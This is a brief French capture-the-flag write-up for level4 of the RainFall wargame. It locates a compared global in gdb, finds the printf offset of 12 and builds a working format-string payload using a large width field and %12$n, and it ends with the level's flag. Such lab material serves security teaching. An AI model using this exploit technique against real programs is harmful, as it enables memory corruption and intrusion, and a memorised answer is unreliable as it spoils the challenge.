gdb level4
disass n
	
	   0x0804848d <+54>:	mov    0x8049810,%eax
	   0x08048492 <+59>:	cmp    $0x1025544,%eax

0x1025544 est compare (16930116 decimal)

On chercher maintenant l'offset

level4@RainFall:~$ ./level4
AAAAAAAAAAA %x %x %x %x %x %x %x %x %x %x %x %x
AAAAAAAAAAA b7ff26b0 bffff754 b7fd0ff4 0 0 bffff718 804848d bffff510 200 b7fd1ac0 b7ff37d0 41414141

Notre offset est 12

On utilise 'Width field' de printf pour generer les 16930114 espaces necessaire

python -c "print '\x10\x98\x04\x08' + '%16930112d' + '%12\$n'" > /tmp/level4

cat /tmp/level4 - | ./level4

0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a
